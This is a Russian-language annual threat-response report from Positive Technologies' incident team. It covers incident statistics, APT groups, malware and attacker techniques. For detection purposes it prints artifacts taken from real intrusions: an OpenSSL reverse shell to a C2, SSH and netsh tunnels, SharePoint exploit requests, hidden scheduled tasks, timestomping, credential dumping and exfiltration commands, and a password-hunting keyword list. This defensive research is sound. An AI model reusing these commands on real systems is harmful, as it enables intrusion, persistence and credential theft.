Департамент комплексного реагирования на киберугрозы экспертного центра Positive Technologies
В этом аналитическом отчете мы подведем итоги работы PT ESC IR за период с IV квартала 2024-го по III квартал 2025 года.
Напомним, что итоги работы за предыдущий период (с IV квартала 2023-го по III квартал 2024 года) можно найти по ссылке.
Наша первая аналитика (за 2021-2023 годы) доступна по ссылке.
Реагирование и расследование инцидентов ИБ — одно из профильных направлений работы PT ESC.
Департамент комплексного реагирования на киберугрозы экспертного центра Positive Technologies (PT ESC IR) имеет более 10 лет опыта реагирования и расследования сложных инцидентов. Ежегодно он реализует 100+ проектов полного цикла в режиме 24/7.
Эксперты готовы включиться в проект любой сложности и уже за 60 минут предоставить первые результаты и определить тип угрозы.
Команда департамента обладает компетенциями по выявлению новых, ранее неизвестных угроз, анализу сложных целенаправленных атак (APT, advanced persistent threat), исследованию вредоносного ПО, а также тактик и техник злоумышленников.
PT ESC IR эффективно расследует инциденты и восстанавливает хронологию событий — от атак с применением вайперов и вирусов-шифровальщиков (LockBit, Babyk и т. д.) до продвинутых целенаправленных APT-атак. PT ESC IR первыми выявили деятельность ряда APT-групп — Hellhounds, Dark River, Space Pirates, TaskMasters и т.д.
Специалисты индивидуально подходят к каждому проекту и придерживаются intelligence-driven-подхода при реагировании на инциденты, что позволяет получить первые результаты быстрее и сократить время простоя бизнес-процессов. Этот подход реализован на базе совместной работы с департаментом PT ESC Threat Intelligence, который осуществляет мониторинг широкого ландшафта угроз. За годы работы нам удалось аккумулировать уникальный набор индикаторов атак, индикаторов компрометации и сигнатур ВПО.
PT ESC IR ведет собственную разработку уникальных инструментов для digital forensics and incident response (DFIR), которые позволяют быстро и эффективно собирать и анализировать данные в географически распределенных инфраструктурах. Эти решения основаны на работе с накопителями (non-volatile), а также на энергозависимых данных (volatile), которые собираются и анализируются в режиме live response.
За отчетный период команда выполнила больше 100 проектов по расследованию и ретроспективному анализу по всему миру. В отчете представлены ключевые цифры, тренды и практические выводы.
100+ проектов по расследованию инцидентов и ретроспективному анализу.
Основной объем работ PT ESC IR в период с IV квартала 2024-го по III квартал 2025 года по-прежнему составили проекты по расследованию инцидентов, при этом доля ретроспективного анализа выросла: на него пришлось 20% работ, что в 2 раза больше по сравнению с предыдущим отчетным периодом.
Спрос на проекты по расследованию инцидентов остается по-прежнему высоким. За первые три квартала 2025 года, по сравнению с предыдущим годом, количество проектов увеличилось на 10 п.п. Мы также наблюдаем общий прирост проектов на 11 п.п. в 2024 календарном году по сравнению с 2023-м.
Мы выделяем следующие основные причины, по которым компании обращаются к нам за помощью в расследовании инцидентов:
Четверть (ровно 25%) всех обращений в PT ESC IR за отчетный период пришлась на четверг. Следующий по популярности день — пятница (23%). Это может говорить о том, что ряд компаний откладывают расследование инцидентов на конец недели, упуская потенциальную возможность локализовать инцидент с минимальными последствиями для организации.
С другой стороны, наиболее ранние следы атак злоумышленников, которые были выявлены экспертами PT ESC IR на основе материалов, предоставленных заказчиками, чаще всего приходились на вторник (22%) и среду (20%). Потенциально это может говорить, в частности, о том, что в PT ESC IR обращаются в случаях атак киберпреступных группировок, у которых есть своя «рабочая неделя».
Во время работ по расследованию инцидентов и ретроспективному анализу специалисты PT ESC IR собирают и обрабатывают информацию со множества узлов под управлением Windows, Unix и macOS. Почти в четверти проектов (23%) была собрана и проанализирована информация более чем с сотни узлов, в 5% — более чем с тысячи.
Чаще всего в ходе расследования используется следующая информация (в порядке убывания частоты предоставления клиентами):
Чаще всего нам предоставляют наборы данных, собранные в процессе триажа нашим инструментом PT Dumper (61%), что в разы ускоряет процесс расследования и реагирования. Нам также нередко предоставляют журналы СЗИ (23%), особенно на начальных стадиях расследования. Отдельно мы отмечаем рост числа проектов, на которых исходной точкой проникновения в инфраструктуру заказчика выступали сетевые устройства — в этих случаях специалисты PT ESC IR анализировали их конфигурации и соответствующие результаты триажа.
PT Dumper — это утилита, написанная на языке Golang и предназначенная для сбора информации (телеметрии) и анализа данных (поиска аномалий) на узлах под управлением Windows, Unix и macOS.
PT Dumper представляет собой скомпилированный бинарный файл с доверенной цифровой подписью, что позволяет стабильно работать и не конфликтовать с другими СЗИ, установленными на исследуемых узлах.
Утилита эффективно показывает себя на проектах по расследованию сложных таргетированных атак и атак с применением вирусов-шифровальщиков, а также позволяет находить новое ВПО.
Запросить PT Dumper можно, написав на почту ir.esc@ptsecurity.com (запросы принимаются с корпоративной почты).
В ряде случаев возникала необходимость анализировать журналы «1С», например, когда злоумышленники использовали 1C_shell для выполнения произвольного кода через «1С». Так как подобные атаки редко оставляют очевидные следы, для их расследования мы прибегаем к анализу журналов регистрации событий «1С».
Наиболее часто за услугами PT ESC IR обращались IT-компании (24%) и госучреждения (24%). Рост числа обращений IT-компаний можно связать с тем, что они являются подрядчиками многих крупных организаций и компрометация одного IT-провайдера может привести к компрометации многих его клиентов.
Из числа наших заказчиков 16% компаний входит в рейтинг крупнейших компаний России по объему реализации продукции RAEX-600.
Среднее время с момента проникновения злоумышленников в инфраструктуру до их локализации составило 9 дней (медианное значение, длительность инцидента). Самая продолжительная вредоносная активность, выявленная в ходе расследования, длилась почти 3,5 года, а самый короткий инцидент — одни сутки.
В некоторых случаях, когда специалистов PT ESC IR привлекают к реагированию на инцидент, злоумышленник еще находится в инфраструктуре и может совершать деструктивные действия в отношении обрабатываемой в ней информации. В таких ситуациях на первый план выходит оперативное сведение инцидента к контролируемой фазе. Считается, что инцидент находится в контролируемой фазе с момента, когда злоумышленники не могут причинить дальнейшего вреда инфраструктуре, не имеют возможности взаимодействовать с собственной сетевой инфраструктурой и распространяться по внутренней сети компании.
После сведения инцидента к контролируемой фазе эксперты PT ESC IR проводят стандартные работы: восстанавливают максимально подробно хронологию инцидента и уточняют его масштабы — определяют все затронутые узлы, учетные записи и т.д.
Обычно выделяют следующие временные характеристики инцидентов:
TTD:
TTR:
В 43% компаний были выявлены следы присутствия известных APT-группировок в тот или иной период времени.
В 22% компаний были выявлены злоумышленники, которых мы отнесли к категории Cybercrime. В эту категорию мы объединили атаки, направленные преимущественно на совершение деструктивных действий (шифрование, уничтожение) в отношении информации и бизнес-процессов компаний.
Важно отметить, что однозначно идентифицировать атакующих не всегда представляется возможным. Так, в 26% компаний были выявлены следы публично не идентифицированных злоумышленников. Распределение жертв выявленных атак по отраслям представлено на рисунке 11.
За рассматриваемый период эксперты PT ESC IR при расследовании инцидентов выявили следы 17 известных APT-группировок, идентифицированных на основе используемых инструментов и ВПО, сетевой инфраструктуры, тактик и техник. Полный список группировок представлен в таблице 1.
Здесь и далее новые (по сравнению с предыдущим отчетным периодом) элементы отмечены знаком «+».
| ExCobalt |
| CloudAtlas |
| GOFFEE |
| Head Mare (PhantomCore) |
| +DarkGaboon |
| Rare Werewolf |
| +oddwater |
| HAFNIUM |
| OldGremlin |
| +bo-team |
| +Gh0stNebula |
| SpacePirates |
| +BlackShadow |
| Silent Crow |
| +TA Tolik |
| APT31 |
| HellHounds |
Интересные факты
Как правило, APT-группировки используют уникальное ВПО для удаленного доступа к инфраструктуре после ее компрометации, а также для сбора и эксфильтрации данных. Примеры ВПО, которое мы встречали в ходе расследования инцидентов, приведены в таблице 2.
| CobInt | +Exploader | CloudyLoader | TheImplant | InfinityLoader |
| Owowa | +CloudSorcerer | QwakMyAgent | tg_grab | +TinyCmd |
| Decoy Dog | +Pumakit | +COFFProxy | +VtDoor (VtChatter) | +Kinsing |
| GoRed | +VBShower | +GrewApacha | PwShell.Carbanak | +RevengeRAT |
| FaceFish | Gh0st-Cringe RAT | +KrustyLoader | +AdvancedLogWiper | +PhantomJitter |
| +flogon stealer | PowerShower | +TinyFluff | ShadowPad | +Socks5PipeProxy |
| Kitsune | +ExOctopus | +TinyGate | Sshdoor | +RemoteHkcuAccess |
| +PowerTaskel | +PhantomProxyLite | +TinyIsolator | +Unicorn | + RDPScanner |
| PlugX | Znkit | +TinyKiller | +BindSycler | +ReLevator |
| netcatdoor | +Cloudatlas Backdoor | +TinyNode | +DQuic | + SecureRust__Downloader |
В атаках злоумышленников (в основном, из категории Cybercrime) часто используются шифровальщики, легитимное ПО для шифрования и вайперы (ПО для затирания данных). Эти инструменты могут использоваться не только для повреждения данных на узлах и вывода их из строя, но и для удаления следов атаки.
Наиболее часто в атаках типа Cybercrime использовался шифровальщик LockBit: его доля составила 29% (−8 п. п. по сравнению с предыдущим периодом). За прошедший отчетный период нам встречался как классический вариант шифровальщика, так и его различные вариации.
Помимо LockBit, популярностью у злоумышленников пользуются легитимные коммерческие и опенсорс-инструменты, предназначенные для шифрования информации, например SDelete. Полный перечень соответствующего ПО, выявленного при выполнении проектов, представлен в таблице 3.
| LockBit | +Griffin | +ThanosWiper |
| Babuk | +Custom LockBit | +Sdrunner_Wiper |
| SDelete | TinyCrypt | +RedAlert |
| BlackShadow | +EsxiWiper | +PolyVice |
| +consumerWiper | +Mimic Ransomware | Neshta Ransomware |
В одном из случаев злоумышленники централизованно развернули и запустили уникальный вайпер на узлах виртуализации VMWare ESXi и применяли для этого пакеты VIB (VMware Installation Bundle). Установка пакета происходит при помощи стандартных инструментов управления ESXi: локально/удаленно (когда VIB лежит в локальном хранилище или доступен по URL).
esxcli software vib install --viburl=/path/to/file.vib
или через PowerCLI/vCenter, например
Connect-VIServer -Server vcenter.local
$esx = Get-VMHost -Name "esx01.local"
Install-VMHostPatch -VMHost $esx -HostPath "http://yourhost/path/file.vib"
Пример вредоносного VIB-пакета:
<vib version="5.0">
<type>bootbank</type>
<name>pack1</name>
<version>1.26.13</version>
<vendor>VMWare</vendor>
<summary></summary>
<description></description>
…
<file-list>
<file>sbin/backup.sh</file>
<file>sbin/dees</file>
<file>sbin/acfb20.sh</file>
</file-list>
<acceptance-level>community</acceptance-level>
…
</vib>
Многие злоумышленники предпочитают использовать встроенные в систему легитимные инструменты living off the land (LOLBins, LOL binaries). Каталоги примеров — на страницах проектов LOLBAS и GTFOBins.
Основные примеры использования таких инструментов уже были рассмотрены в предыдущем исследовании. В этот раз мы хотим поделиться более свежими и экзотичными примерами.
Так, злоумышленники использовали легитимный инструмент для туннелирования сетевого трафика DevTunnels для соединения с управляющей инфраструктурой. ВПО PlugX прослушивало локальные сетевые порты 53 и 5355, а при помощи DevTunnels открывался обратный туннель до C2 через инфраструктуру Microsoft. Пример использования:
C:\\WINDOWS\\system32\\Devtunnel.exe host [REDACTED]
В другом случае злоумышленники использовали компонент AdobeFips, входящий в состав Adobe Acrobat Reader, для установления соединения с контролирующим сервером. Он является подлинной версией клиента OpenSSL, подписанной компанией Adobe. Вот фрагмент вредоносной задачи, использующей этот инструмент:
<Actions Context="NetworkService">
<Exec>
<Command>%windir%\system32\speech_onecore\common\SpeechModelDownload.exe</Command>
</Exec>
<Exec>
<Command>%COMSPEC%</Command>
<Arguments>/c "%PROGRAMFILES%\Adobe\Acrobat DC\Acrobat\OSSLLibs\AdobeFips.exe" s_client -quiet [REDACTED]|cmd</Arguments>
</Exec>
</Actions>
В одном из инцидентов нам встретилась вот такая нестандартная конфигурация SSH-профиля общедоступного SSH-клиента OpenSSH:
Host version
Hostname [REDACTED]
User [REDACTED]
Port 443
ServerAliveInterval 60
ServerAliveCountMax 15
RemoteForward 46033
StrictHostKeyChecking no
SessionType None
В этом примере используется подключение по протоколу HTTPS (порт 443), отключена проверка и запись в файл с известными узлами (known_hosts). Таким образом можно получить соединение без вывода предупреждения о ключах и по нестандартному порту. Более того - в совокупности с названием хоста, конфигурация позволяла злоумышленникам подключаться к С2 через относительно невинную на первый взгляд команду:
ssh version
В дальнейшем, подобные манипуляции позволили злоумышленникам установить сетевой туннель средствами OpenSSH (более подробно подобные примеры можно изучить в нашей статье).
Ранее мы делились способом проксирования портов при помощи утилиты netsh, что тоже может быть использовано для перенаправления трафика на управляющие сервера злоумышленников:
netsh interface portproxy add v4tov4 listenport=7000 connectaddress=example.com connectport=443 protocol=tcp
Кроме ВПО и встроенных в систему легитимных инструментов, злоумышленники по-прежнему активно используют общедоступные утилиты. Мы разметили это ПО на тепловой карте согласно тактикам MITRE ATT&CK, отразив частоту их выявления в проектах (см. рисунок 13).
В этом разделе мы рассмотрим часто используемые и наиболее значимые техники атак в терминах MITRE ATT&CK Matrix for Enterprise (версия 15.1) — в тексте даны ссылки на их подробное описание. Для некоторых подтехник приведены практические примеры (идентификаторы указаны в скобках, например T1566.001). Для удобства процесс атаки разбит на десять условных логических этапов, соответствующих тактикам MITRE ATT&CK (рисунок 14).
Самым распространенным (36%) способом проникновения злоумышленников в корпоративную инфраструктуру остается эксплуатация уязвимостей в веб-приложениях, доступных из интернета (Exploit Public-Facing Application). Мы также отмечаем, что поверхность атаки стала намного разнообразнее: кроме популярных ранее Microsoft Exchange и «1C-Битрикс», специалисты PT ESC фиксировали взлом находившейся на периметре «1C», системы удаленного мониторинга и управления Assistant, СЭД Tessa, корпоративного почтового сервера CommuniGate Pro, системы виртуализации рабочих столов Omnissa Horizon, компонента корпоративной системы управления мобильными устройствами Ivanti Sentry (CVE-2023-38035), общедоступного серверного ПО для предоставления геопространственных данных GeoServer (CVE-2024-36401), сетевых продуктов Citrix Netscaler (CVE-2019-19781) и Juniper Junos (CVE-2023-36845), платформы для совместной работы Microsoft SharePoint (CVE-2025-53770, CVE-2025-53771, CVE-2024-38094, CVE-2024-38024, CVE-2024-38023).
В частности, для взлома платформы Microsoft SharePoint использовались относительно свежие уязвимости — CVE-2025-53770 и CVE-2025-53771. CVE-2025-53770 — это уязвимость, связанная с ошибкой десериализации недоверенных данных, которая позволяет неаутентифицированному злоумышленнику добиться удаленного выполнения кода. CVE-2025-53771 заключается в обходе ограничений пути/некорректной аутентификации (path traversal/spoofing) и дает возможность злоумышленнику загружать и выгружать файлы и криптографические секреты или подменять серверное поведение. Мы предполагаем, что количество использований этих уязвимостей будет расти, и крайне рекомендуем установить официальные патчи и обновления Microsoft для затронутых версий SharePoint (Microsoft SharePoint Server 2019, Microsoft SharePoint Server Subscription Edition, Microsoft SharePoint Enterprise Server 2016) и удалить или ограничить публичный доступ к экземплярам SharePoint.
Как один из примеров, который попал в отчетный период, можно отметить эксплуатацию уязвимости CVE-2025-53770 на практике. На узлах SharePoint Server 2019 были зафиксированы HTTP-запросы, характерные для эксплуатации уязвимости CVE-2025-53770, в результате которых была создана локальная учетная запись и получен удаленный доступ. В итоге были скомпрометированы не только общедоступные порталы, но и внутренняя инфраструктура.
Примеры вредоносных запросов приводим ниже:
| Где смотреть: | C:\inetpub\logs\LogFiles\[IISSITE]\u_ex[DATE].log |
| Что смотреть: | [DATE] [TIME] [IP] POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - [IP2] Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0 /_layouts/SignOut.aspx 200 0 64 7859 [DATE] [TIME] [IP] POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - [IP2] Mozilla/5.0+(Macintosh;+U;+Intel+Mac+OS+X+10_7_7)+AppleWebKit/532.1+(KHTML,+like+Gecko)+Chrome/50.0.801.0+Safari/532.1 /_layouts/SignOut.aspx 401 0 0 93 [DATE] [TIME] [IP] GET /_layouts/15/spinstall0.aspx - 443 - [IP2] Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.1.15 - 401 0 0 15 |
На второе место по частоте эксплуатации (28%) вышли доверительные отношения (trusted relationship) — это проникновение в инфраструктуру целевой организации через компанию подрядчика. Можно связать популярность этого исходного вектора с ростом атак на IT-компании, компрометация которых зачастую может приводить к компрометации их клиентов.
В 11% случаев злоумышленники получали первоначальный доступ через доступные из интернета службы, такие как VPN, RDP или SSH (External Remote Services).
Еще в 17% случаев исходным вектором проникновения стали рассылки фишинговых писем (Phishing). В частности, использовалась уязвимость CVE-2017-11882 (RCE в Microsoft Equation Editor) в специально подготовленном пользовательском документе.
В качестве примера можем привести следующую атаку: злоумышленники проникли в инфраструктуру заказчика через фишинговое письмо с ZIP-вложением, внутри которого был LNK-файл. При его открытии запускался отвлекающий документ и интерпретатор Node.js с полезной нагрузкой. В результате на cкомпрометированном хосте был развернут DNS-туннель для связи с инфраструктурой атакующих.
Другой пример: злоумышленники создали обращение в системе Zendesk, к которому приложили ссылку на вредоносный файл, впоследствии запущенный специалистом техподдержки. Атакующие скомпрометировали учетные данные, с помощью которых, предположительно, получили доступ к CRM. В CRM злоумышленники изменили email одного из пользователей, получили код подтверждения для восстановления учетной записи, с использованием которой зашли в личный кабинет и списали деньги со счета одного из пользователей.
В этом году отмечается рост числа инцидентов, в которых наблюдалась компрометация сетевых устройств, зачастую с устаревшими прошивками или небезопасными настройками. Их доля составила 8%. Так, в одном из наших расследований злоумышленникам удалось скомпрометировать ряд сетевых маршрутизаторов Cisco, публично доступных из интернета. Эта атака стала возможной из-за недостатка в конфигурации протокола SNMPv2 (настройка SNMP Community, обеспечившая режим доступа для всех устройств на чтение и запись в несуществующий список доступа, что позволило злоумышленникам получить доступ по стандартному паролю). Злоумышленники использовали нативные возможности Cisco IOS для настройки GRE-туннелирования, активной разведки сетевых устройств, создания привилегированных локальных учетных записей, попыток выгрузки данных с сервера резервных копий. Для сокрытия следов вредоносной активности злоумышленники использовали уникальные EEM-апплеты, сбрасывающие конфигурацию устройства по триггеру легитимных команд. В результате злоумышленники смогли получить контроль над частью сетевого трафика (в частности, почтового: SMTP/POP3/IMAP) и добиться перенаправления данных через свои туннели.
В некоторых случаях злоумышленники используют несколько точек проникновения в инфраструктуру, например, если изначально выбранный вектор не позволяет им повысить привилегии и (или) продолжить продвижение по инфраструктуре.
Один из наиболее часто используемых злоумышленниками способов закрепления связан с созданием задач в планировщике заданий (Scheduled Task/Job). Так, в упомянутом ранее инциденте планировщик запускал скрытую задачу (злоумышленники удалили XML из файловой системы и Security Descriptor) для запуска ВПО PlugX:
| Где смотреть: | C:\Users\[User]\AppData\Roaming\ntuser.dat.LOG1 |
| Что смотреть: | ... schtasks /create /RL HIGHEST /F /tn "7zup_Server" /tr "C:\PROGRA~1\7-Zip\7zUp.exe -remote up" /sc onstart /RU SYSTEM schtasks /run /tn 7zup_Server reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\7zup_Server" /v SD /f del %SystemRoot%\System32\Tasks\7zup_Server /f ... |
Забавный факт: выдержка выше взята из журнала модуля кейлоггера ВПО PlugX и является изрядным примером того, что порой инструменты злоумышленников следят не только за скомпрометированными пользователями, но и за самими злоумышленниками...
Кроме того, злоумышленники создали запланированную задачу, которая запускала сервис с заведомо неправильными параметрами, чтобы выполнился модифицированный скрипт ErrorHandler.cmd, устанавливающий связь с контрольными серверами злоумышленников:
| Где смотреть: | C:\Windows\System32\Tasks\*.xml |
| Что смотреть: | … <Exec> <Command>C:\Windows\System32\oobe\Setup.exe</Command> <Arguments>/ui</Arguments> </Exec> … |
Сам модифицированный скрипт ErrorHandler.cmd выглядит так:
| Где смотреть: | C:\Windows\Setup\Scripts\ErrorHandler.cmd |
| Что смотреть: | @echo off taskkill /im VMtools.exe /f timeout /t 5 /nobreak >nul C:\ProgramData\VMware\VDM\VMtools.exe host [REDACTED] timeout /t 2 /nobreak >nul exit |
Пример того, как вредоносный сервис может выглядеть в реестре ОС Windows:
| Где смотреть: | HivePath: | C:\Windows\System32\config\SYSTEM | |
| KeyPath: | ControlSet001\Services\[SERVICE] | ||
| Что смотреть: | Value Name | Value Type | Value Data |
| Type | REG_DWORD | 16 | |
| Start | REG_DWORD | 2 | |
| ErrorControl | REG_DWORD | 1 | |
| ImagePath | REG_EXPAND_SZ | "C:\Users\Default\AppData\Roaming\Microsoft\ssdspsrv.exe" | |
| DisplayName | REG_SZ | SSDPS Discovery | |
| WOW64 | REG_DWORD | 1 | |
| ObjectName | REG_SZ | LocalSystem | |
Еще один интересный пример закрепления — при помощи Docker-контейнера. Злоумышленники модифицировали образ, добавив копирование вредоносного скрипта и его запуск. Сам скрипт, в свою очередь, загружал с управляющего сервера ВПО, выдавал ему права на исполнение, прописывал в автозагрузку и в конце самоуничтожался. В рассмотренном случае образ был помещен в локальный реестр образов, что обеспечило автоматическое распространение ВПО и его запуск на новых контейнерах.
Примеры образцов ВПО в слоях Docker-контейнера:
/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/processes
/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/checksДля повышения привилегий злоумышленники чаще всего эксплуатируют известные уязвимости (Exploitation for Privilege Escalation). Так, в одном случае злоумышленники использовали уязвимость BlueKeep (CVE-2019-0708) для повышения привилегий. Это критическая уязвимость удаленного выполнения кода в службе Remote Desktop Service, возникающая из-за ошибки обработки удаленных соединений по протоколу RDP. Уязвимость эксплуатируется до аутентификации и позволяет злоумышленнику отправить специально сформированные запросы, которые приводят к переполнению буфера в памяти ядра и выполнению произвольного кода с системными правами. К уязвимым ОС относятся Windows XP, Windows Vista, Windows 7, Windows Server 2003 и Windows Server 2008, так что вопрос своевременного обновления ОС все еще актуален.
В другом случае злоумышленники принесли с собой целый «мешок картошки»: CoercedPotato, DeadPotato, GodPotato, EfsPotato. Как понятно из их названий, они все реализуют атаку Potato-типа (проксирование NTLM-аутентификации локальной службы).
| CoercedPotato | Заставляет системный процесс самому аутентифицироваться (MS-EFSRPC/MS-RPRN) + relay |
| DeadPotato | Использует отражение NTLM-аутентификации локально (RPC → NTLM reflection) через через MSRPC/COM для получения токена SYSTEM |
| GodPotato | Использует неверную проверку привилегий при вызове COM-интерфейсов |
| EfsPotato | Использует EFSRPC-запросы как вектор для принуждения аутентификации |
А вот так могут выглядеть следы использования общедоступной утилиты для повышения привилегий LinPEAS в журналах ОС Linux:
| Где смотреть: | /var/log/messages-[DATE] (может зависеть от используемого семейства ОС Linux) |
| Что смотреть: | [DATE] [HOST] kernel: [15939] 0 15939 27756 84 0 0 0 linpeas.sh |
Уже долгое время наиболее распространенным инструментом для похищения учетных данных остается утилита Mimikatz (и ее модификации): она встречается почти в половине (49%) проектов. На втором месте по частоте использования для получения учетных данных —утилита ProcDump (10% проектов). Эта утилита входит в состав общедоступного пакета SysInternals и используется злоумышленниками для создания дампов памяти привилегированных процессов (в частности, lsass для дальнейшего извлечения аутентификационных данных).
В уже упомянутом расследовании злоумышленники модифицировали inline-скрипт OWA flogon.js, подменяя обработчик кнопки входа clkLgn так, чтобы в момент авторизации он перехватывал введенные логины и пароли и отправлял их на управляющий сервер (например, через https://[C2]/?key1=smthuser&key2=smthpassword) или записывал в доступный по сети журнал (check.aspx → log.png), в результате чего было похищено около 650 учетных записей, при этом злоумышленники подменяли временные метки, чтобы скрыть следы вредоносной активности.
Основные способы сбора учетных данных мы отразили в прошлогоднем исследовании, в целом они остаются актуальными — от использования специализированных утилит, таких как XenAllPasswordPro, secretsdump, до банального просмотра пользовательских файлов, содержащих логины и пароли в открытом виде.
Вот так может выглядеть в журналах ОС Windows команда для запуска общедоступной утилиты XenAllPasswordPro:
| Где смотреть: | C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx | |
| Что смотреть: | Provider | PowerShell |
| EventID | 600 | |
| Ключевая информация | … HostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -C [Console]::OutputEncoding = New-Object System.Text.UTF8Encoding;C:\\drivers\\updates\\XenAllPasswordPro.exe -a C:\\drivers\\updates\\i.html … | |
А так — команда для запуска общедоступной утилиты secretsdump, входящей в состав фреймворка Impacket, в отношении конкретного узла:
| Где смотреть: | C:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx | |
| Что смотреть: | Provider | Microsoft-Windows-Sysmon |
| EventID | 1 | |
| Ключевая информация | ... "CommandLine": "s.exe [USER]:@[IP] -hashes [HASH] -just-dc-user krbtgt", ... "CurrentDirectory": "[C:\\Users\\[USER]\\Desktop\\]", ... "Image": "C:\\Users\\[USER]\\Desktop\\s.exe", ... "ParentCommandLine": "\"cmd.exe\" /s /k pushd \"C:\\Users\\[USER]\\Desktop\"", "ParentImage": "C:\\Windows\\System32\\cmd.exe", ... | |
Часто злоумышленники упаковывают и обфусцируют вредоносный код (Obfuscated Files or Information). В частности, по-прежнему популярны упаковщики UPX и VMProtect. Помимо этого, киберпреступники пользуются обфускаторами кода, например garble.
На этапе постэксплуатации злоумышленники стараются ослабить защиту инфраструктуры (Impair Defenses), в том числе отключая или перенастраивая средства безопасности (T1562.001), прежде всего антивирусы, мешающие установке ВПО, например, при помощи общедоступных инструментов Kavremvr или Defender Control.
В ряде инцидентов было отмечено использование техники подмены временных меток (T1070.066). В частности, в истории командной строки встречались подобные команды, позволяющие выставить датой последнего изменения/доступа к файлу его дату создания:
| Где смотреть: | C:\Users\[User]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt |
| Что смотреть: | $path="c:\windows\system32\cloudflared.exe";$time = "[DATE]";(Get-Item $path).LastWriteTime = $time;(Get-Item $path).CreationTime = $time;(Get-Item $path).LastAccessTime = $time |
Нередки случаи частичного или полного удаления злоумышленниками содержимого системных журналов, как нативными средствами, так и с использованием отдельных утилит, в частности ADVANCED LOGWIPER, для затруднения последующего forensic-анализа скомпрометированных узлов (T1070.001/T1070.002).
Получив первоначальный доступ, злоумышленники проводят исследование сети — сканируют корпоративную инфраструктуру в поисках точек дальнейшего продвижения, активно используя сетевые сканеры. В числе наиболее распространенных мы выделяем Nmap (17%) и fscan (17%). Полный перечень сетевых сканеров отражен на тепловой карте инструментов (см. рисунок 13).
В Windows-инфраструктурах особенно распространена разведка Active Directory с помощью инструментов ADRecon, ADExplorer и AdFind.
В некоторых случаях злоумышленники приносят с собой общедоступные инструменты для быстрого поиска, такие как Everything и LAN Search. С помощью Everything чаще всего ищут локальные файлы, содержащие парольную информацию в открытом виде, а с помощью LAN Search проводят поиск по сетевым ресурсам и локальным дискам.
Вот пример конфигурационного файла lansearch.ini с одного из проектов, который дает представление о том, что могут искать злоумышленники в скомпрометированных инфраструктурах:
ResList=\\FTH
FolderList=ADMIN$
History=*,~*.kdbx; парол; доступ; впн; vpn; pass; user; пол; кош; walle; cryp; крип; текст; text; лог; log; рдп; rdp; тунел; tun; conn; соедин~
TextHistory=~~
Пример использования общедоступной утилиты fscan:
| Где смотреть: | /root/.bash_history |
| Что смотреть: | wget http://[IP]:8000/fscan chmod +x fscan ./fscan -h [NETWORK] & ./fscan -h [NETWORK]/24 &./fscan -h [NETWORK]/16 -nobr |
Пример использования общедоступной утилиты pyVmomi:
| Где смотреть: | /var/log/hostd.log (в данном примере – журналы узла виртуализации VMWare ESXi) |
| Что смотреть: | [DATE] info hostd[2101615] [Originator@6876 sub=Vimsvc.ha-eventmgr opID=esxcli-45-468f] Event 1536 : User [USERNAME]@[IP] logged in as pyvmomi Python/3.13.2 (Linux; 6.11.2-amd64; x86_64) |
Или, например, злоумышленники использовали инструмент netscan:
| Где смотреть: | C:\Windows\System32\winevt\Logs\Microsoft-Windows-DistributedCOM%4Operational.evtx | |
| Что смотреть: | Provider | Microsoft-Windows-DistributedCOM |
| EventID | 10028 | |
| Ключевая информация | ... { "Binary": "[BINARY]", "param1": "[IP]", "param2": " 1134", "param3": "C:\\Users\\[REDACTED]\\Pictures\\#Netscan_2\\Netscan\\netscan.exe" } ... | |
Чтобы остаться незамеченными, для разведки злоумышленники широко используют техники living off the land, то есть штатные команды и утилиты ОС: whoami, net, nslookup, ipconfig и т. п.
Для перемещения внутри сети атакующие в основном используют протоколы RDP (T1021.001), SMB (T1021.002) и SSH (T1021.004). На этом этапе для удаленного выполнения команд злоумышленники по-прежнему чаще всего применяли утилиты SMBExec и AtExec из состава Impacket (выявлен в 39% проектов) и PsExec из состава Sysinternals (27%). Мы также видим использование инструментов AtExec-Pro и PAExec, которые обладают сходными функциями.
Еще один инструмент, AD_GPO_EXEC, использует механизм групповых политик для пакетного выполнения команд и других операций для указанных компьютеров, пользователей или всех компьютеров в определенном организационном подразделении.
Пример использования общедоступной утилиты SMBExec:
| Где смотреть: | C:\Windows\System32\winevt\Logs\System.evtx | |
| Что смотреть: | Provider | Service Control Manager |
| EventID | 7045 | |
| Ключевая информация | ... “ImagePath”:”%COMSPEC% /Q /c echo net accounts ^> %%%%%COMPUTERNAME%%%C$%%__output 2^>^&1 > %SYSTEMROOT%%%uBUMpvCZ.bat & %COMSPEC% /Q /c %SYSTEMROOT%%%uBUMpvCZ.bat & del %SYSTEMROOT%%%uBUMpvCZ.bat” ... | |
Для управления скомпрометированными узлами, в том числе для доставки на них ВПО, злоумышленники могут использовать как собственные RAT, так и легитимные/общедоступные средства удаленного администрирования. Наблюдается тренд на использование инструментов с открытым исходным кодом вместо проприетарных разработок злоумышленников.
В тройку наиболее популярных среди злоумышленников инструментов для удаленного управления узлами вошли AnyDesk, mRemoteNG и Radmin. С полным списком выявленных инструментов этого класса можно ознакомиться в таблице 4. Из нового, по сравнению с прошлым годом, можно отметить утилиты Remote Desktop Manager (RDM), RustDesk и VNC Viewer.
Интересно, что в одном случае злоумышленники принесли с собой менеджер пакетов Chocolatey, чтобы с его помощью скачать общедоступный инструмент для удаленного управления узлами Mesh Agent.
| AnyDesk | mRemoteNG | RustDesk |
| Dameware | RAdmin | Tactical RMM |
| Mesh Agent | Remote Desktop Manager (RDM) | VNC Viewer |
